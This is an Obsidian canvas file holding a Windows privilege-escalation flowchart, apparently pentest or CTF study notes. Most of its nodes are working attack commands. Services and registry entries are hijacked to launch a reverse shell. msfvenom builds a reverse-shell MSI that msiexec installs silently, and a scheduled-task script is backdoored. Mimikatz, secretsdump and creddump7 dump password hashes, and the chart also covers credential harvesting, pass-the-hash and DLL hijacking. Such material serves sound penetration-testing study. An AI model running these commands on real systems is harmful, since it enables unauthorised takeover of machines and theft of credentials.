{
	"nodes":[
		{"id":"03439f32ac25ffce","type":"text","text":"```cmd\nwhoami /priv\n```","x":25,"y":-350,"width":250,"height":60},
		{"id":"da87cf29f849c5ba","type":"text","text":"Check the privileges against this website: \n\nhttps://github.com/gtworek/Priv2Admin\n\nIf possible, exploit it!","x":540,"y":-218,"width":598,"height":138,"color":"1"},
		{"id":"273faeca59041798","type":"text","text":"Is there any service that have permission to change configs?: \n```cmd\naccesschk.exe - uwcqv \"$username\" * \n```\n\n(we are looking for \"SERVICE_CHANGE_CONFIG\" privilege)","x":-150,"y":80,"width":600,"height":180,"color":"3"},
		{"id":"6cdae31d00d47a94","type":"text","text":"```cmd\nsc config $service_name= \"\\\" C:\\Path\\to\\revshell.exe\\\"\"`\n```","x":660,"y":360,"width":668,"height":80,"color":"1"},
		{"id":"c13ed96d7b4f2be3","type":"text","text":"```cmd\nnet start $service_name\n```","x":692,"y":520,"width":604,"height":58,"color":"1"},
		{"id":"d0457e8fc347dec9","type":"text","text":"Is there any unquoted services?\n```cmd\nwmic service get name,displayname,pathname,startmode |findstr /i \"Auto\" |findstr /i /v \"C:\\Windows\\\\\" |findstr /i /v \"\"\"\n```","x":-150,"y":691,"width":600,"height":229,"color":"3"},
		{"id":"1d6db5176c9e3d41","type":"text","text":"```cmd\ncopy C:\\Path\\to\\revshell.exe \"C:\\Path\\to\\service\\directory\\$service_name.exe\n```\n","x":660,"y":1040,"width":820,"height":58,"color":"1"},
		{"id":"943834098f170770","type":"text","text":"```cmd\nnet start $service_name\n```","x":768,"y":1200,"width":604,"height":58,"color":"1"},
		{"id":"d86c25ded66365d8","type":"text","text":"Use accesschk ,Is there any service that has \"NT AUTHORITY\\INTERACTIVE\" privilege? ","x":-257,"y":1520,"width":814,"height":56,"color":"3"},
		{"id":"fe9143a8c38d8a44","type":"text","text":"Check the services with help of this website:\n\nhttps://steflan-security.com/windows-privilege-escalation-weak-permission/","x":660,"y":1640,"width":820,"height":120,"color":"2"},
		{"id":"5ea61650f3e9e396","type":"text","text":"```cmd\nreg add `HKLM\\SYSTEM\\CurrentControlSet\\services\\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\\Path\\to\\revshell.exe /f`\n```","x":470,"y":1840,"width":1200,"height":58,"color":"1"},
		{"id":"aaf68c1a317c4ec8","type":"text","text":"```cmd\nnet start $service_name\n```","x":768,"y":2000,"width":604,"height":58,"color":"1"},
		{"id":"10b7b049d3691fcd","type":"text","text":"Using accesschk.exe, is there any service that (BINARY_PATH_NAME) file is writable by everyone\n```cmd\naccesschk.exe /accepteula -quvw \"C:\\Path\\to\\insecureservice.exe\"\n```\n","x":-150,"y":2160,"width":607,"height":200,"color":"3"},
		{"id":"f85994e4fb66e228","type":"text","text":"```cmd\ncopy C:\\Path\\to\\revshell.exe \"C:\\Path\\to\\vulnerable\\service\\directory\\$service_name\" /Y\n```\nOr move file and place new one","x":824,"y":2480,"width":1096,"height":113,"color":"1"},
		{"id":"b7b5b505da364472","type":"text","text":"Run following command, is there any non default .exe file? : \n```cmd\nreg query HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\n```","x":-181,"y":2840,"width":670,"height":114,"color":"5"},
		{"id":"de33ac082fef8b9d","type":"text","text":"```cmd\ncopy C:\\Path\\to\\revshell.exe \"C:\\Program Files\\Autorun\\Program\\program.exe\" /Y\n```","x":334,"y":3205,"width":1038,"height":75},
		{"id":"d080b1d8e722fa86","type":"text","text":"Service Exploitation","x":-960,"y":776,"width":250,"height":60,"color":"3"},
		{"id":"636666d8bab1fca8","type":"text","text":"Registry Explotation","x":-1109,"y":3090,"width":250,"height":60,"color":"5"},
		{"id":"6b61c409a9188366","type":"text","text":"Check if the \"Always Install Elevated\" vulnerability exist\n```cmd\nreg query HKCU\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer /v\nAlwaysInstallElevated\n```\n\n```cmd\nreg query HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer /v\nAlwaysInstallElevated\n```","x":-181,"y":3760,"width":679,"height":281,"color":"5"},
		{"id":"e897e5daa2cd5ef2","type":"text","text":"Both: keys are equal to `0x1`","x":-11,"y":4160,"width":340,"height":85,"color":"2"},
		{"id":"617d6ad06cfddba3","type":"text","text":"Create a .msi backdoor and transfer it to the target : `\n```cmd\nmsfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=9001 -f msi -o reverse.msi\n```","x":480,"y":4320,"width":909,"height":114,"color":"1"},
		{"id":"a28433d9d9a84078","type":"text","text":"```cmd\nmsiexec /quiet /qn /i C:\\Path\\to\\revshell.msi\n```","x":692,"y":4512,"width":486,"height":57,"color":"1"},
		{"id":"1bffe1fd6b130141","type":"text","text":"Do we have any non default scheduled task? : \n```powershell\nGet-ScheduledTask | where {$_.TaskPath -notlike \"\\Microsoft*\"} | ft TaskName,TaskPath,State\n```","x":-292,"y":4620,"width":901,"height":114,"color":"6"},
		{"id":"5542214ddc3342f4","type":"text","text":"Scheduled tasks","x":-807,"y":4649,"width":250,"height":60,"color":"6"},
		{"id":"391b9e7e19677657","type":"text","text":"Use accesschk do we have write permission on that file? : \n```cmd\naccesschk.exe /accepteula -quvw user C:\\Path\\To\\Scheduled\\task.ps\n```","x":692,"y":4860,"width":784,"height":114,"color":"1"},
		{"id":"e22db187bbae7f49","type":"text","text":"```powershell\necho C:\\Path\\To\\revshell.exe >> C:\\Path\\To\\Scheduled\\task.ps1\n```","x":685,"y":5040,"width":798,"height":58,"color":"1"},
		{"id":"d710735f52e9315f","type":"text","text":"Check following locations, are they exist and did you find creds in them? :\n```\nC:\\Unattend.xml\nC:\\Windows\\Panther\\Unattend.xml\nC:\\Windows\\Panther\\Unattend\\Unattend.xml\nC:\\Windows\\system32\\sysprep.inf\nC:\\Windows\\system32\\sysprep\\sysprep.xml\n```","x":-168,"y":5140,"width":654,"height":260,"color":"#ff00ff"},
		{"id":"8f9cc14e34992fce","type":"text","text":"Check PowerShell history : \n```powershell\ntype C:\\Users\\$User_name\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadline\\ConsoleHost_history.txt\n```","x":-361,"y":5560,"width":1040,"height":119,"color":"#ff00ff"},
		{"id":"cbd2ac09045f8f82","type":"text","text":"Credential harvesting","x":-860,"y":5590,"width":250,"height":60,"color":"#ff00ff"},
		{"id":"fa8e5c36fae9d6db","type":"text","text":"Check if we have an credentials in IIS configuration page :\n```cmd\nC:\\inetpub\\wwwroot\\web.config\n```\nor\n```cmd\nC:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Config\\web.config\n```","x":-264,"y":6120,"width":847,"height":299,"color":"#ff00ff"},
		{"id":"e3bb8664fdbb50aa","type":"text","text":"Check if we have any saved credentials : \n```cmd\ncmdkey /list\n```\n\n","x":-167,"y":5840,"width":654,"height":140,"color":"#ff00ff"},
		{"id":"b48917c0afb3a603","type":"text","text":"Found credentials!\nAuthenticate with new credentials\n","x":1039,"y":5582,"width":481,"height":97,"color":"1"},
		{"id":"8f78838031d3ce62","type":"text","text":"Hash dumping","x":-860,"y":7440,"width":250,"height":60,"color":"4"},
		{"id":"faca0f98a3399c85","type":"text","text":"Upload mimikatz Dump the hashes : \n\n```cmd\n./mimikatz.exe \"privilege::debug\" \"lsadump::lsa /patch\" \"exit\"\n```\n\nAre you authenticated for this process or and/or did you find anything?\n\nhttps://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Mimikatz.md","x":-313,"y":6680,"width":947,"height":258,"color":"4"},
		{"id":"674f4ce4640e4ec3","type":"text","text":"Use evil-winrm if target's wimrm port is open","x":659,"y":7301,"width":501,"height":99,"color":"1"},
		{"id":"c67c6dd7245cd4dc","type":"text","text":"Got some output","x":1035,"y":7080,"width":250,"height":60,"color":"2"},
		{"id":"6632740313c4b9c7","type":"text","text":"Use tools that allows PTH attack ,If you find yourself in\ntrouble crack the hash with hashcat (-m 1000)","x":1200,"y":7301,"width":561,"height":99,"color":"1"},
		{"id":"bfa1645286278983","type":"text","text":"Check If you have `SeBackupPrivilege`\n\nor do you have (read) access to\n\n```\nC:\\Windows\\repair\\SAM\nC:\\Windows\\repair\\SYSTEM\n```\n\nOr, is there  a `windows.old` folder, this could contain a copy of the SAM and SYSTEM\n\nhttps://juggernaut-sec.com/dumping-credentials-sam-file-hashes/","x":-264,"y":7375,"width":847,"height":385,"color":"4"},
		{"id":"4bce0f53af5aa8dd","type":"text","text":"Transfer the files to attacker machine, use creddump7 : `\n```bash\npython3 creddump7/pwdump.py SYSTEM SAM\n```","x":583,"y":8160,"width":834,"height":114,"color":"1"},
		{"id":"ca474532b42182e6","type":"text","text":"Transfer the files to attacker machine use impacket's secretsdump : \n```bash\nsecretsdump.py -sam SAM -system SYSTEM LOCAL\n```","x":1460,"y":8160,"width":800,"height":114,"color":"1"},
		{"id":"93241d424a13e128","type":"text","text":"Positive","x":1735,"y":7840,"width":250,"height":60,"color":"2"},
		{"id":"d379d522113ccbe4","type":"text","text":"This doesn't require file transfer (assuming we uploaded mimikatz already) \nLaunch mimikatz and give this command : \n```cmd\nlsadump::sam /system:SYSTEM /SAM:SAM\n```","x":2380,"y":8160,"width":880,"height":160,"color":"1"},
		{"id":"a5f47d5e6391a9e6","type":"text","text":"Do we have an port local port that isn't listed by nmap ? :\n```cmd\nnetstat -ano\n```\n\nhttps://juggernaut-sec.com/port-forwarding/","x":-144,"y":8480,"width":607,"height":170,"color":"#001eff"},
		{"id":"f162196a8d18d9ab","type":"text","text":"Use **chisel** to find out what's going on over there","x":607,"y":8784,"width":513,"height":56,"color":"1"},
		{"id":"aac33871c26d9956","x":-680,"y":8535,"width":250,"height":60,"color":"#001eff","type":"text","text":"Local ports"},
		{"id":"ad214434cd5ad3ec","x":-180,"y":9000,"width":679,"height":160,"type":"text","text":"Check if we're a part of  interesting group such as `DnsAdmins`\nhttps://book.hacktricks.xyz/windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges"},
		{"id":"52226a7c85e58f5a","x":607,"y":9000,"width":993,"height":160,"color":"1","type":"text","text":"Check against this list\n\nhttps://book.hacktricks.xyz/windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges\n\nExploit it\n"},
		{"id":"15344e263a21ad19","x":35,"y":9360,"width":250,"height":60,"color":"2","type":"text","text":"GUI access?"},
		{"id":"f7cdb074cfc3fa1c","x":589,"y":9575,"width":891,"height":119,"color":"1","type":"text","text":"Upload **procmon** and look for not found **dlls** and follow the instruction of the link that is attached. \nDid you find what you're looking for\n\nhttps://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dll-hijacking"},
		{"id":"007adfa54473a5a7","x":1104,"y":9860,"width":396,"height":60,"color":"1","type":"text","text":"Great enjoy your new privileges"},
		{"id":"01f583743a23038b","x":607,"y":9853,"width":375,"height":107,"type":"text","text":"Check if there is any application that is running by Admin such as paint"},
		{"id":"fcd878649af491b3","x":783,"y":10160,"width":717,"height":149,"type":"text","text":"In short try to open another file in misconfigured application ,enter full path of\ncmd.exe. This article will help you:\n\nhttps://juggernaut-sec.com/insecure-gui-applications/"},
		{"id":"732e7223b70cb776","x":-332,"y":9610,"width":304,"height":50,"type":"text","text":"Check installed software"},
		{"id":"649ea77f5ee02104","x":-28,"y":9860,"width":250,"height":60,"color":"1","type":"text","text":"Exploit it!"},
		{"id":"aae568c3e3837222","x":-419,"y":9963,"width":516,"height":237,"type":"text","text":"Run \n```cmd\nsysteminfo > systeminfo.txt\n```\ntransfer the output to the attacker machine and pipe it to WES-NG. Probably a kernel exploit\nhttps://github.com/bitsadmin/wesng"},
		{"id":"5536743fc6b2f3d0","x":-380,"y":10320,"width":421,"height":188,"color":"2","type":"text","text":"Well time to see if automated scripts helps\n\nRun automated scripts\n1. winPEAS"}
	],
	"edges":[
		{"id":"029a78c0a638404b","fromNode":"03439f32ac25ffce","fromSide":"bottom","toNode":"da87cf29f849c5ba","toSide":"left","label":"Privileges"},
		{"id":"ebfb9b394f9867a2","fromNode":"03439f32ac25ffce","fromSide":"bottom","toNode":"273faeca59041798","toSide":"top","label":"No luck with privileges"},
		{"id":"006bf19499f46757","fromNode":"273faeca59041798","fromSide":"bottom","toNode":"6cdae31d00d47a94","toSide":"left","label":"Service can be adjusted"},
		{"id":"401f308998f4a3c9","fromNode":"6cdae31d00d47a94","fromSide":"bottom","toNode":"c13ed96d7b4f2be3","toSide":"top"},
		{"id":"c608f2075ed0eb96","fromNode":"273faeca59041798","fromSide":"bottom","toNode":"d0457e8fc347dec9","toSide":"top","label":"No insecure service permission"},
		{"id":"fd090b7f3371cf7b","fromNode":"d0457e8fc347dec9","fromSide":"bottom","toNode":"1d6db5176c9e3d41","toSide":"left","label":"Unqouted service path"},
		{"id":"8f6d2aba030ee843","fromNode":"1d6db5176c9e3d41","fromSide":"bottom","toNode":"943834098f170770","toSide":"top"},
		{"id":"c8e3fa7f019b23cd","fromNode":"d0457e8fc347dec9","fromSide":"bottom","toNode":"d86c25ded66365d8","toSide":"top","label":"No Unqouted service path"},
		{"id":"7920a4f2e476b0f0","fromNode":"d86c25ded66365d8","fromSide":"bottom","toNode":"fe9143a8c38d8a44","toSide":"left","label":"Weak Register Permissions"},
		{"id":"ca4d2ee2a0e3d1b9","fromNode":"fe9143a8c38d8a44","fromSide":"bottom","toNode":"5ea61650f3e9e396","toSide":"top"},
		{"id":"020644bfaa0dc98d","fromNode":"5ea61650f3e9e396","fromSide":"bottom","toNode":"aaf68c1a317c4ec8","toSide":"top"},
		{"id":"a6a1e8223910bd5f","fromNode":"d86c25ded66365d8","fromSide":"bottom","toNode":"10b7b049d3691fcd","toSide":"top","label":"No weak register permissions"},
		{"id":"f1eabfb0d9060954","fromNode":"10b7b049d3691fcd","fromSide":"bottom","toNode":"f85994e4fb66e228","toSide":"left","label":"Insecure Service Executables"},
		{"id":"d06e138fcd77dc24","fromNode":"10b7b049d3691fcd","fromSide":"bottom","toNode":"b7b5b505da364472","toSide":"top","label":"No insecure service executable"},
		{"id":"57381f2c52c4b09c","fromNode":"b7b5b505da364472","fromSide":"bottom","toNode":"de33ac082fef8b9d","toSide":"left"},
		{"id":"9af72ccb4b5ee094","fromNode":"d080b1d8e722fa86","fromSide":"right","toNode":"273faeca59041798","toSide":"left"},
		{"id":"eb4c056128a7370e","fromNode":"d080b1d8e722fa86","fromSide":"right","toNode":"d0457e8fc347dec9","toSide":"left"},
		{"id":"bbd0abed8486e2ae","fromNode":"d080b1d8e722fa86","fromSide":"right","toNode":"d86c25ded66365d8","toSide":"left"},
		{"id":"20da2856f6a9718a","fromNode":"d080b1d8e722fa86","fromSide":"right","toNode":"10b7b049d3691fcd","toSide":"left"},
		{"id":"545afb092402ca0b","fromNode":"b7b5b505da364472","fromSide":"bottom","toNode":"6b61c409a9188366","toSide":"top"},
		{"id":"404f0686c85dc2eb","fromNode":"6b61c409a9188366","fromSide":"bottom","toNode":"e897e5daa2cd5ef2","toSide":"top"},
		{"id":"9970ee68665dca66","fromNode":"636666d8bab1fca8","fromSide":"right","toNode":"b7b5b505da364472","toSide":"left"},
		{"id":"193e19bd4b38de8a","fromNode":"636666d8bab1fca8","fromSide":"right","toNode":"6b61c409a9188366","toSide":"left"},
		{"id":"4656dbe84e0a382d","fromNode":"e897e5daa2cd5ef2","fromSide":"bottom","toNode":"617d6ad06cfddba3","toSide":"left","label":"Yes"},
		{"id":"723a03e3401f4568","fromNode":"e897e5daa2cd5ef2","fromSide":"bottom","toNode":"1bffe1fd6b130141","toSide":"top","label":"No"},
		{"id":"6823e16c3b974363","fromNode":"617d6ad06cfddba3","fromSide":"bottom","toNode":"a28433d9d9a84078","toSide":"top"},
		{"id":"ebc4f1871c804da8","fromNode":"5542214ddc3342f4","fromSide":"right","toNode":"1bffe1fd6b130141","toSide":"left"},
		{"id":"5c87eeebe52a9d8c","fromNode":"1bffe1fd6b130141","fromSide":"bottom","toNode":"391b9e7e19677657","toSide":"left","label":"Scheduled tasks"},
		{"id":"45fae60014d77b67","fromNode":"1bffe1fd6b130141","fromSide":"bottom","toNode":"d710735f52e9315f","toSide":"top","label":"No scheduled tasks"},
		{"id":"9a07bae5d93e8689","fromNode":"391b9e7e19677657","fromSide":"bottom","toNode":"e22db187bbae7f49","toSide":"top"},
		{"id":"05d6a32962cb6037","fromNode":"d710735f52e9315f","fromSide":"bottom","toNode":"8f9cc14e34992fce","toSide":"top"},
		{"id":"81084d9f320b66f8","fromNode":"cbd2ac09045f8f82","fromSide":"right","toNode":"d710735f52e9315f","toSide":"left"},
		{"id":"99d05e6279a96166","fromNode":"cbd2ac09045f8f82","fromSide":"right","toNode":"8f9cc14e34992fce","toSide":"left"},
		{"id":"df0dee0b5e3fb414","fromNode":"8f9cc14e34992fce","fromSide":"bottom","toNode":"e3bb8664fdbb50aa","toSide":"top"},
		{"id":"cfba075b8d50d352","fromNode":"cbd2ac09045f8f82","fromSide":"right","toNode":"e3bb8664fdbb50aa","toSide":"left"},
		{"id":"e3c2063f11dfd8e9","fromNode":"e3bb8664fdbb50aa","fromSide":"bottom","toNode":"fa8e5c36fae9d6db","toSide":"top"},
		{"id":"b3b6a22786fc17b9","fromNode":"cbd2ac09045f8f82","fromSide":"right","toNode":"fa8e5c36fae9d6db","toSide":"left"},
		{"id":"e6b96680de4235d9","fromNode":"d710735f52e9315f","fromSide":"bottom","toNode":"b48917c0afb3a603","toSide":"top"},
		{"id":"15edd5989f76c2af","fromNode":"8f9cc14e34992fce","fromSide":"right","toNode":"b48917c0afb3a603","toSide":"left"},
		{"id":"e683bbbb4c96975c","fromNode":"e3bb8664fdbb50aa","fromSide":"right","toNode":"b48917c0afb3a603","toSide":"left"},
		{"id":"96439fde697363f2","fromNode":"fa8e5c36fae9d6db","fromSide":"right","toNode":"b48917c0afb3a603","toSide":"left"},
		{"id":"4ddd9ce64aa0b819","fromNode":"fa8e5c36fae9d6db","fromSide":"bottom","toNode":"faca0f98a3399c85","toSide":"top"},
		{"id":"fbf213bab58539f1","fromNode":"8f78838031d3ce62","fromSide":"right","toNode":"faca0f98a3399c85","toSide":"left"},
		{"id":"ff87a33c9cb7147f","fromNode":"faca0f98a3399c85","fromSide":"bottom","toNode":"c67c6dd7245cd4dc","toSide":"left"},
		{"id":"181655737d564362","fromNode":"c67c6dd7245cd4dc","fromSide":"bottom","toNode":"674f4ce4640e4ec3","toSide":"top"},
		{"id":"fb5456d03798c603","fromNode":"c67c6dd7245cd4dc","fromSide":"bottom","toNode":"6632740313c4b9c7","toSide":"top"},
		{"id":"2783459d14562f5c","fromNode":"faca0f98a3399c85","fromSide":"bottom","toNode":"bfa1645286278983","toSide":"top"},
		{"id":"5f1f434651aca7f5","fromNode":"8f78838031d3ce62","fromSide":"right","toNode":"bfa1645286278983","toSide":"left"},
		{"id":"9ca02597b05c06d5","fromNode":"bfa1645286278983","fromSide":"bottom","toNode":"93241d424a13e128","toSide":"left","label":"Are we lucky today?"},
		{"id":"cb9d37578a7332cb","fromNode":"93241d424a13e128","fromSide":"bottom","toNode":"4bce0f53af5aa8dd","toSide":"top"},
		{"id":"82876e8cbfd38b73","fromNode":"93241d424a13e128","fromSide":"bottom","toNode":"ca474532b42182e6","toSide":"top"},
		{"id":"d8c9bf21e7c7c15b","fromNode":"93241d424a13e128","fromSide":"bottom","toNode":"d379d522113ccbe4","toSide":"top"},
		{"id":"a816ac0ef362f171","fromNode":"bfa1645286278983","fromSide":"bottom","toNode":"a5f47d5e6391a9e6","toSide":"top","label":"No luck yet"},
		{"id":"c523bed2905c4ca9","fromNode":"a5f47d5e6391a9e6","fromSide":"bottom","toNode":"f162196a8d18d9ab","toSide":"top","label":"Yes, there are internal ports open"},
		{"id":"8ca5f1b77d65816a","fromNode":"a5f47d5e6391a9e6","fromSide":"bottom","toNode":"ad214434cd5ad3ec","toSide":"top"},
		{"id":"fb3579ea7d2f1f58","fromNode":"aac33871c26d9956","fromSide":"right","toNode":"a5f47d5e6391a9e6","toSide":"left"},
		{"id":"cf94f942d3a91eb0","fromNode":"ad214434cd5ad3ec","fromSide":"right","toNode":"52226a7c85e58f5a","toSide":"left"},
		{"id":"f708ceb404158fdd","fromNode":"ad214434cd5ad3ec","fromSide":"bottom","toNode":"15344e263a21ad19","toSide":"top"},
		{"id":"a975e5451233937c","fromNode":"15344e263a21ad19","fromSide":"bottom","toNode":"f7cdb074cfc3fa1c","toSide":"top","label":"Yes"},
		{"id":"5439ef7ff73067f2","fromNode":"f7cdb074cfc3fa1c","fromSide":"bottom","toNode":"007adfa54473a5a7","toSide":"top","label":"Yes"},
		{"id":"cd78f07e83e640da","fromNode":"f7cdb074cfc3fa1c","fromSide":"bottom","toNode":"01f583743a23038b","toSide":"top","label":"No"},
		{"id":"82bfdded9d9b6441","fromNode":"01f583743a23038b","fromSide":"bottom","toNode":"fcd878649af491b3","toSide":"top","label":"Yes"},
		{"id":"370ab9f23d175d20","fromNode":"15344e263a21ad19","fromSide":"bottom","toNode":"732e7223b70cb776","toSide":"top","label":"No"},
		{"id":"cd39779b63c2ce77","fromNode":"01f583743a23038b","fromSide":"left","toNode":"732e7223b70cb776","toSide":"right","label":"No"},
		{"id":"7a831c04ddfef6eb","fromNode":"732e7223b70cb776","fromSide":"bottom","toNode":"649ea77f5ee02104","toSide":"top","label":"Vulnerable software"},
		{"id":"b743142a1066109c","fromNode":"732e7223b70cb776","fromSide":"bottom","toNode":"aae568c3e3837222","toSide":"top"},
		{"id":"b3c565491142331e","fromNode":"aae568c3e3837222","fromSide":"bottom","toNode":"5536743fc6b2f3d0","toSide":"top","label":"No luck yet!"}
	]
}